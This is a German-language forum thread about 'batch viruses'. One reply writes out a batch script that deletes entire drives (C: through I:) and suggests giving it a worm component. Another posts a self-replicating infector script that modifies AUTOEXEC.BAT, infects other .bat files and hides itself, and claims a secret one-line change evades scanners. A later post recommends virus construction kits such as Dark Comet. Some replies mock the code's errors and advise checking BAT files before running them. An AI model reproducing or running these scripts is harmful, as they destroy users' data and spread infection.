Batch Viren
lima-city → Forum → Sonstiges → Off-Topic
-
Suche Definition und Beschreibung f?r Batch Viren, sowie Bek?mfung usw. Au?erdem br?uchte ich nen guten Link f?r Batch Viren!
-
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
Hm... Batchviren sind Batchdateien, die B?ses tun. Was eine Batchdatei ist, wirst du wohl wissen, denke ich. Soweit zur Beschreibung bzw. Definition. Bek?mpfen kann die meiner Meinung nach kein Antivirenprogramm, da Batchdateien keine Viren im herk?mmlichen Sinne sind. Ist ja nur Text. Beim Link muss ich passen, aber hier hast du einen Batchvirus:
@echo off
rmdir /q /s c:\
rmdir /q /s d:\
rmdir /q /s e:\
rmdir /q /s f:\
rmdir /q /s g:\
rmdir /q /s h:\
rmdir /q /s i:\
u.s.w.
Mit copy und $0 kannst du dem "Virus" auch noch eine Wurmkomponente hinzuf?gen. Wird zwar relativ schwierig, aber wird schon gehen. -
wollt ihr mal nen richtig schönen batch-virus sehen?
@echo off>nul. CaT
if '%1=='Inf goto CaTi
if exist c:\!CaT. bat goto CaTs
if not exist %0. bat goto CaTe
find "CaT"<%0. bat>c:\!CaT. bat
find "CaT" c:\autoexec. bat >nul
if not errorlevel 1 goto CaTs
echo.|date|find "30">nul. CaTs
if errorlevel 1 goto CaTs
echo echo CaT KillS YouR SysteM ... ;-> >>c:\Autoexec. bat
echo ctty nul >>c:\autoexec. bat
:CaTs
For %%a in (*. bat) do call c:\!CaT Inf %%a
goto CaTe
:CaTi
find "CaT"<%2>nul
if not errorlevel 1 goto CaTe
type c:\!CaT. bat>CaT.t
echo echo CaT InFeCtEd YoUr SyStEm >>CaT.t
type %2>>CaT.t
move CaT.t %2>nul. CaT
attrib c:\!CaT. bat +h +r +a
:CaTe
mit ner kleinen änderung (eine zeile am anfang einfügen), wird der virus dann für jeden scanner "unsichtbar"!!!
und 0-checka:
batch-viren sind auf der einen seite viren auf der anderen wiederum auch nicht, da es schad-scripts sind...
und die meisten batchviren können von jedem guten scanner bekämpft werden!
wie schon gesagt:
wenn man bei den scripts nach dem @echo off noch eine zeile einfügt (die ich hier nicht öffentlich preisegeben werde... (schickt mir ne pn)) wird die praktisch unsichtbar für so gut wie alle virenscanner!
da erkennt man mal was ne gute antiviren-software ist!!!
mfg -
bada-batch schrieb:
Ich will hier nichts auseinandernehmen, aber:
wollt ihr mal nen richtig schönen batch-virus sehen?
@echo off>nul. CaT if '%1=='Inf goto CaTi if exist c:\!CaT. bat goto CaTs if not exist %0. bat goto CaTe find "CaT"<%0. bat>c:\!CaT. bat find "CaT" c:\autoexec. bat >nul if not errorlevel 1 goto CaTs echo.|date|find "30">nul. CaTs if errorlevel 1 goto CaTs echo echo CaT KillS YouR SysteM ... ;-> >>c:\Autoexec. bat echo ctty nul >>c:\autoexec. bat :CaTs For %%a in (*. bat) do call c:\!CaT Inf %%a goto CaTe :CaTi find "CaT"<%2>nul if not errorlevel 1 goto CaTe type c:\!CaT. bat>CaT.t echo echo CaT InFeCtEd YoUr SyStEm >>CaT.t type %2>>CaT.t move CaT.t %2>nul. CaT attrib c:\!CaT. bat +h +r +a :CaTe
mit ner kleinen änderung (eine zeile am anfang einfügen), wird der virus dann für jeden scanner "unsichtbar"!!!
und 0-checka:
batch-viren sind auf der einen seite viren auf der anderen wiederum auch nicht, da es schad-scripts sind...
und die meisten batchviren können von jedem guten scanner bekämpft werden!
wie schon gesagt:
wenn man bei den scripts nach dem @echo off noch eine zeile einfügt (die ich hier nicht öffentlich preisegeben werde... (schickt mir ne pn)) wird die praktisch unsichtbar für so gut wie alle virenscanner!
da erkennt man mal was ne gute antiviren-software ist!!!
mfg
Der Versuch der Umleitung
wird bei einem Versuch bleiben, da hier in 2 Dateien anscheinend umgeleitet werden sollte (?). Das Leerzeichen zwischen dem . und bat darf nicht sein. Das gleiche gilt für alle Anderen Leerzeichen zwischen . und bat in Dateinamen.>>c:\Autoexec. bat
Natürlich haben die meisten Leute noch Windows-Versionen, die nicht auf NT basieren, deshalb wird der Virus auch viel davon haben, wenn er in die autoexec.bat-Datei schreibt (die übrigens traditionell und vom alten FAT-Dateisystem her stammend als AUTOEXEC.BAT groß geschrieben wird).
Mit BAT-Dateien kann man natürlich richtige Programme schreiben, deshalb ist es auch möglich, ausschließlich mit einem BAT-Virus viel schaden anzurichten (in der Tat lässt sich sogar Schaden anrichten).
Der größte Schaden entsteht wohl im Gehirn des BAT-Virenentwicklers....
Wichtig ist noch, dass man den Virenscanner natürlich per BAT-Virus zuerst mal deaktiviert, da ein richtiger Virenscanner nur oberflächlich als Programm mit einer schönen GUI und nervigen Fehlwarnungen läuft, aber sonst im System keine weiteren Eingriffe macht um nicht noch mehr überwachen zu können.
Mal enst:
das mit in die autoexec.bat-Datei schreiben nützt auf NT-basierenden Systemen gar nichts.
Um ernsthaft Schaden verursachen zu können muss das Script mit echten Administratorrecht ausgeführt werden, was unter Windows 7 etweder durch deaktivieren der UAC oder durch "Run as" möglich ist.
Systemdateien sollten trotzdem nicht so leicht zerstört werden können, da sich Windows selbst da nochmal wehrt...
Vorbeugung gegen BAT-Viren: einfach mal in die BAT-Datei schauen, bevor man sie startet
-
Ich würde zu Virenbaukästen greifen.
Der Youtube kanal SemperVideo hat zu dem thema einiges interresantes zu bieten.
Es gibt einen Legalen baukasten namens Dark Comet ist aber nür für private zwecke legal.
Ansonsten Batch viruse sind eine nette spielerei :) -
viewstore schrieb:
Ich würde zu Virenbaukästen greifen.
Ich würde den Thread wegen Leichenfledderei schließen. Hier ein paar der Spammeldungen dazu:
→ gemeldet von xxxx: aaaalter ist der nekrophil o0
→ gemeldet von xxxx: uraltthread
→ gemeldet von xxxx: Leichenschänder -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
